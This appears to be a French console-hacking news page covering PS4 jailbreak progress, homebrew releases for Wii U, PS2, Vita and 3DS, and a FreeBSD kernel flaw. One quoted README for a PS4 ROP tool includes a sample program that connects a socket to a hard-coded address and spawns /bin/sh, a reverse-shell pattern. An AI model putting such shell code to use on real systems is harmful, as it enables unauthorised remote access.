Logic-Sunrise : actualités, téléchargements, releases, dossiers et tutoriaux

Comme vous avez certainement vu récemment l'équipe de chinois de chez Chaitin tech a réussi à lancer Linux sur le firmware 4.01 de la PS4.

Ils n'ont pas releasé toutes leurs découvertes pour l'instant concernant cet exploit simplement un Github où ils donnent des pistes aux développeurs sur le ROP.

Ils apportent quand même une fois de plus leur pierre à l'édifice en contribuant au Github de Fail0verflow et à l’implémentation du Kexec system call qui est fait pour booter directement un kernel Linux sur l'OS de la ps4.

En effet avec leurs découvertes ils ont modifié les fichiers du Github pour permettre l’exécution de Linux sur les firmwares 3.55,4.00 et 4.01:

Vous trouverez toutes les modifications à cette adresse:

https://github.com/f...9735e2cf8907e1e

Ces informations et modifications ne seront utiles qu'aux développeurs.

Restons attentif aux prochains jours peut être que d'autres développeurs prendront le relai

Nous vous l'annoncions il y a peu, un développeur répondant au nom de Yardape8000 s'est mis en tête de proposer un mod de Wupinstaller de Dimok789 et c'est ainsi qu'il nous offre Wupinstaller Mod.

 

Pour rappel, ce mod permet notamment de retirer ou d'activer la whitelist ou la blacklist, mais il permet aussi l'installation d'un fichier (même nuisible) de prendre en compte des sauvegardes à partir d'autres régions, etc...

 

Yardape a publié pas moins de trois versions de son mod, en quatre jours, (versions 1.1.1, 1.2 et celle-ci).

 

 

 

Au total, énormément de bugs ont été résolus, le plus important étant celui qui survenait lors du choix entre la nand et le port USB.

Beaucoup de petites améliorations sont mises en place, notamment dans la description des actions que permettent certains boutons et des erreurs qui peuvent se produire, mais aussi dans la détection plus poussé des répertoires et du dernier répertoire utilisé et dans la gestion de la carte SD.

 

En clair, l’utilitaire devient nettement plus accessible pour les moins initiés.

 

Changelog:

 

v1.2.1
- Fixed error display 0xFFFBxxxx [Cyan]
- Moved error codes to main install menu.
- Don't display files in SD:/install if subfolders are used

v1.2
- Fixed selection of NAND/USB.
- Allow remount of SD and rescan folders.
- More button & error descriptions.
- Show last installed folder.

v1.1.1
- Display install directory while installing and on errors.
- Start at first selected directory when installing. This fixes an issue where if you pick to install on an unselected directory, it may install anyway.

 

Télécharger WupInstaller Mod 1.2.1

 

 

Les développeurs de la scène PS2 s'activent une nouvelle fois pour démontrer que la scène de la console de deuxième génération de Sony est toujours vivante. Ce sont les développeurs krHACKen et Maximus32 qui nous proposent de découvrir de nouvelles versions de leur homebrews.   A commencer par krHACKen qui livre ID Dumper mais aussi SCEDoormat NoME. ID Dumper est un utilitaire qui va vous permettre de décharger ou dumper l'ID iLink, les clés CDVD et l'ID PS2HDD de votre console PS2.    

 

 

PS2 ID_Dumper A little PS2 ELF which was coded for the sole purpose of dumping the machine and iLink IDs, the CDVD keys (DNA$ and SUD), and the $ONY HDD ID. It also reads the entire MECHACON NVRAM...   The dumped data are saved as raw binaries to the USB drive.   To dump your PS2HDD ID, you need three $ONY drivers (dev9.irx, atad.irx and hdd.irx), NOT INCLUDED in this package. The download comes free of $ONY proprietary code.   How to use : 1) Copy the needed modules to the ID_DUMPER folder; 2) Copy the ID_DUMPER folder in the root of your FAT32 formatted USB device; 3) Run RUNME.ELF.​   Optional drivers in Pastie nbr 10951082​  

 

 

  Téléchargement : ID_DUMPER    

Ensuite le développeur nous offre le code source d'un très bon utilitaire nommé SCEDoormat NOME (émulation MECHACON) qui est un logiciel compatible  DMCA qui vous permet de convertir un ELF en fichier FELP, qui peut alors être exécuter à partir d'un disque dur. Le code source provient de la Release 3 sortie le 13 Avril 2015. 

 

 

 

 

 

  Hello,   I decided to share the src of my SCEDoormat (No ME Version) Release 3 proggy...   The code is quite messy and meh, although it compiles fine. Should not be difficult to port the tool to other operating systems, or add your program the ability to decipher the KRYPTO files and play LEGOs:playful:...   Regards.  

 

 

  Téléchargement : src_SCEDoormat3_NoME.zip     Enfin, c'est le développeur Maximus32 qui a publié PS2Linux v3.8, cette mis à jour intègre désormais de nombreux changements et des optimisations, comme par exemple une amélioration de la vitesse Ethernet ainsi que la possibilité de spoof sous MAC, l'arrivée du noyau 3.8 permet de se libérer du 2.6.     

 

 

  Ps2Linux v3.8 ​   The release is ready, at last .   New kernel features: - one network driver for FAT and SLIM, stable - ethernet MAC address spoofing - ethernet speed increased - new fast HDD DMA driver - 2.6.35.4 upgraded to 2.6.35.14 - 2.6 kernel has same features as 3.8 - ps2dev interface working on both kernels - sps2mod working on both kernels​   New usb stick features: - sps2mod modules included, use "sps2_load" to load them - sps2dev demo's included (dma_triangle, spky_bumpmap, sps2_triangle, tshower and vspeed) - some applications to do some tests like hdparm, iperf and bonnie++.​   Feature requests welcome: - Changes to the kernel config (like adding usb drivers or file systems) - Changes to buildroot (like applications, services)​

 

 

  Téléchargement : ps2linux3.8_v0.1.img.gz et ps2linux3.8_v0.2.img.gz  

Le développeur Crediar nous propose de découvrir une nouvelle version de son outil DiscU qui permet d'extraire les images disque Wii U.    Nous devons le salut de cet outil grâce au leak de la Common Key, DiscU s'articule autour d'un exécutable qui permet d'extraire l'intégralité d'une iso Wii U (musiques, niveaux, images...). A noter que vous devez avoir la clé du jeu disckey.bin, le fichier game.wud du jeu, et la ckey.bin, la common key.        
Version 4.1b Fixes wrong IV in sys part adds content extraction for WUP install few other minor changes&fixes.     DiscU v 4.1b by crediar Built: 00:42:46 Oct 28 2016 Usage: DiscU.exe game.key game.wud [c]   c: extract content files only

 

 

 

Téléchargement : DiscU v4.1b

 

 

 

TheFlow à qui l'on doit la plus part des meilleurs homebrews sur Vita, vient de mettre à jour son VitaShell en version 1.4.

La grosse nouveauté de cette version est une nouvelle sécurité permettant la recherche d'éventuelles fonctions dangereuses dans les vpk lors de leur installations. Cette version apporte également la compression "réglable" pour les fichiers zip créés dans VitaShell, elle fix aussi les permissions pour transférer des fichiers dans ux0:video et quelques petites choses visibles dans le changelog.

 

 

Changelog 1.4:

 

- Added group RW permissions on files and folders when moving. Safe homebrews like RetroArch will now recognize files and folders that you have moved from 'ux0:video'.

- Added scanning for dangerous functions in packages.

- Added possibility to choose compression level.

- Fixed time information in zip archives.

 

 

Vous pourrez mettre à jour VitaShell directement depuis l'application ou pour ceux préférant rester hors ligne installer le vpk que vous pouvez télécharger à cette adresse: VitaShell v1.4

Chose promise, chose due, le code qui permet l'exploit sous firmware 4.01 a été dévoilé, il s'agit d'un outil privé sous forme de code qui permet le jailbreak de la PlayStation 4.    

 

 

  PRO: PROgramming ROP like a PRO   This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.   Build   pip install git+https://github.com/chaitin/pro If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.   cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4 Examples   toy {     {% include "gadgets.pro" %}     {% include "glibc.pro" %}     const AF_INET(2);     const SOCK_STREAM(1);     const IPPROTO_IP(0);     var fd;     socket(AF_INET, SOCK_STREAM, IPPROTO_IP);     func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;     store_rdx_rax(&fd, undefined);     printf("socket fd = %d\n", fd);     array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];     connect(fd, addr, 0x10);     {% for i in range(3): %}         dup2(fd, {{i}});     {% endfor %}     system("/bin/sh");     exit(1); } Usage   A BIG TODO. Just try and learn by yourself.   Quick Guide   All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.   Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.   Array can be declared with size(Int) or directly initialized with its content(String).   For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.

 

 

  Bien entendu, ce code et les exemples sont réservés aux développeurs.   Tout est là : chaitin/pro   Téléchargement : ROP Tool   

La Team Gateway nous confirme sur son site internet officiel que son linker est totalement fonctionnel sur le tout dernier firmware de Nintendo 11.2. La team confirme, même si nous le savions déjà, que le firmware est totalement innofensif pour les fonctions du linker.  

Les fonctions, l'EmuNAND et le menu de sélection multiroms sont totalement fonctionnels sous ce nouveau firmware 11.2.

 

 

 

 

    26/10 – Latest Emunand support   Posted on October 26, 2016   Just a quick confirmation that Gateway Emunand support Nintendo’s latest firmware 11.2 You can safely update your Emunand.   More to come soon!

 

 

 

  Alors que ExZap nous informe que la version Patreon v1.6.2 sera disponible le 29 Octobre 2016, nous y reviendrons en détails à ce moment là, nous apprenons l'arrivée d'un nouvel utilitaire nommé Cemu Utilities qui est disponible dans une toute première version v0.01.   Uniquement développé pour Cemu Windows 64, Cemu Utilities va vous permettre de modifier légèrement les jeux, et optimiser encore un peu plus Cemu. Pour le moment, Cemu Utilities ne fonctionne qu'avec Super Mario 3D World.   Bien entendu pour le moment les fonctions sont très limitées, quelques tweaks et quelques codes pour le jeu, mais il y a de grandes chances qu'il progresse rapidement.           
This is a release of CEMU Utilities 0.01, for the WiiU Emulator CEMU for Win64.    Requirements  ------------    - Windows 7 (x64) or above  - OpenGL 4.0 (4.5 is used if available)  - RAM: 4 GB minimum, 6 GB or more recommended  - NVIDIA GPU or AMD GPU    CEMU Utilities 0.01 Filelist  --------------------------------  DInput0.dll 4,590,080 -> Main program  MakeUtilities.exe 43,008 -> Make "Cemu Utilities.exe"    Check the files you get, if they are not the same as above, please go to http://www.ff18.com to  download one, or some functions may not work correctly.    Usage  -----    Run "MakeUtilities.exe" to Create CEMU Utilities for offical version. A filenamed "Cemu Utilities.exe"  should be appeared.    You should see a "# Utilities #" menu when you run "Cemu Utilities.exe". There are 5 submenus in it.    1 Golden Finger -> Status 60%. -> 金手指  Golden Finger is finger make by pure gold, usually as the second finger in the right hanf.    2 Game Buster -> Status 10%. -> 遊戲克星    GameBuster is a game cheater(like CheatEngine).    3 Speed Pig -> Status 10%. -> 變速小豬    Speed Pig is a tool to increase or decrease the delay between refresh, so it should make the EMU  run faster or slower, but it is still according to your CPU. If it can't make your games faster  because your CPU is too slow, the delay between frame to frame is very little, so you won't notice  a very large increase.    4 Snap IT -> Status 10% -> 截距滷味  This is a tool to snap a picture of EMU, the short key is ALT+S. All the snaps should be put in  SNAPS folder. It snaps not only the game screen, but the entire Chankast window.    5 About CEMU Utilities  This file which you are seeing.      Contacts  --------  Kryso - The main programmer of CEMU Utilities      

 

 

    Téléchargement  : Cemu Utilities Ver 0.01   

 

La Team Libretro informe sur son compte twitter qu'elle est en train de travailler sur une version de RetroArch pour Wii U. Le développeur Aliaspider a travaillé avec l'équipe Libretro sur le portage de l'émulateur New 3DS et Playstation Portable sur la Wii U.         Même si pour l'heure aucune version n'est disponible, même en bêta, il reste intéressant de savoir que ce portage est encours d'étude.        Information : Portage préliminaire retroArch Wii U   

Le développeur Red-EyeX32 nous confirme que son bypass fonctionne, si vous êtes sous firmware 4.01 ne mettez pas à jour, vous pouvez bypasser pour profiter du 4.05 sans mettre à jour votre console.    Il semblerait que Sony n'est pas changé le chemin d'accès sur ses serveurs, seulement le passphrase, et en conséquence, son PSProxy fonctionne parfaitement.            Téléchargement : PSProxy 4.00  

Nous apprenons une fois de plus sur le forum de Wololo, quelques infos intéressantes à propos du hack 4.01 de la team chinoise lors du concours GeekPwn.

 

Après que les membres de la team est annoncés qu' ils révèleraient les failles de leur exploit à Sony, d' autres devs se sont empresser de chercher comment ce dernier à été mis en place.

 

 

 

 

Avec les premières recherches, certaines personnes auraient eu accès à quelques infos sur l'exploit FreeBSD de la team Taichin Tech.L'exploit kernel de ce hack 4.01, reposerait apparemment sur une faille CVE (CVE-2016-1885) qui a été révélé en Avril. Il semblerait qu' elle n' ai pas été correctement patché et qu' elle serait une des failles que les hackers Taichin Tech auraient utilisés pour accéder au système interne de la PS4.

 

The argument validation in r296956 was not enough to close all possible overflows in sysarch(2)

 

 

 

 

Bien sur, tout ceci n' est pour l'instant pas encore prouvé, mais les choses avancent dans le bon sens, de plus FreeBSD étant open-source, les détails de la correction de cette faille kernel pourront aidés nos hackers à mieux comprendre comment cette dernière fonctionne.

Naturellement toutes ces infos, sont pour nous simple users, incompréhensibles, mais ne doutons pas que les personnes qualifiées seront quoi en faire et s' en servis comme il le faut.

Ce qui a déjà commencé d' après certains hackers.

 

Que reste-t-il en théorie pour un jailbreak des PS4 >1.76?

 

En 1.76, les choses sont déjà faites, nous possédons un exploit webkit et un exploit kernel, pour le reste des PS4 donc >1.76, en théorie, je le répète, nous possédons un exploit webkit en 3.55 (la même faille d' henkaku) par contre il nous manquait juste un exploit kernel afin d' être au même niveau que les PS4 en 1.76, d' où l' importance de cette faille CVE (CVE-2016-1885).

 

Donc en conclusion, les PS4 en 3.55 et moins ont de grandes chances de rejoindre les PS4 en 1.76 au niveau possibilité de Hack (Linux, Menu Debug, etc...).

Pourquoi 3.55 et moins et non 4.01 et moins, tout simplement car nous ne possédons pas la faille webkit utilisé par les chinois et cette dernière sera (a été?) révélé à Sony, elle sera donc bloqué si ce n'est pas déjà le cas avec le 4.05.

 

SpecterDev confirme sur la shootbox de pshax ce qui vient d'être écrit sur cette news:

 

 

Nous vous conseillons, si le hack PS4 vous intéresse, de ne pas mettre à jour vos consoles au dessus de 3.55 afin de profiter de la faille webkit et ainsi du futur exploit kernel.

Pour ceux en 4.00/4.01il vous faudra être patient et ne pas mettre à jour en 4.05 afin de ne pas perdre la faille webkit toujours présente dans ces 2 firmwares mais non connue encore de la scène (en théorie).

 

Liens concernant cette fameuse faille kernel:

 

- FreeBSD security Advisorie

- CVE-2016-1885

- L'exploit kernel avec les corrections apportés

 

 

 

Alors que le hack PS4 semble prendre une nouvelle tournure, la scène PS Vita continue sur sa lancé en proposant toujours plus d' homebrews et d'utilitaire à destination de la dernière portable de Sony.

 

Nous apprenions il y a peu une petite découverte plutôt intéressante, en effet, nous savons maintenant que les Ps Vita 1000 et 2000 possèdent une mémoire de stockage interne (ur0:) respectivement de 2GB pour le modèle 1000 et 1,5GB pour le 2000.

 

Pourquoi parler de cela me diriez vous, tous simplement pour la raison suivante, Lupo511, membre des forums de Wololo, vient de publier un nouvel homebrew permettant d' accéder et de stocker des applications dans cette mémoire (ur0:) avec : Application Storage Manager v0.01.

 

 

 

Cela permettra donc à tous de récupérer quelques gigas de stockage, au vu du prix et de la rareté des cartes SD aujourd’hui ceci n' est pas négligeable.

Attention toute fois, accéder à cette partie de votre console comporte des risques, Lupo511 lui même nous met en garde sur son utilisation:

 

Citation de l' auteur:

 

Gardez à l'esprit que cela n'a pas été testé à 100% et certaines applications peuvent ne pas fonctionner lorsqu' elles sont déplacés vers la mémoire interne. Je ne l'ai testé qu' avec des homebrews et non avec des jeux. Je ne prends aucune responsabilité pour tout dommage que cela pourrait faire à votre console.

 

 

Tuto:
 

Use DPAD UP and DPAD DOWN to change the selected option Use X to select/confirm Use O to go back/cancel
The confirm button will be binded to X even if your console uses the O-to-confirm bindings because I had some problems while trying to check the actual system confirm button. I’ll make it work as intended once I fix it.

It’s an unsafe homebrew because it needs access to the whole filesystem (ux0:app/, ur0:app/, ur0:shell/db/). The source is also linked below, so you may build from source if you want.

 

 

 

 

Télécharger Application Storage Manager v0.01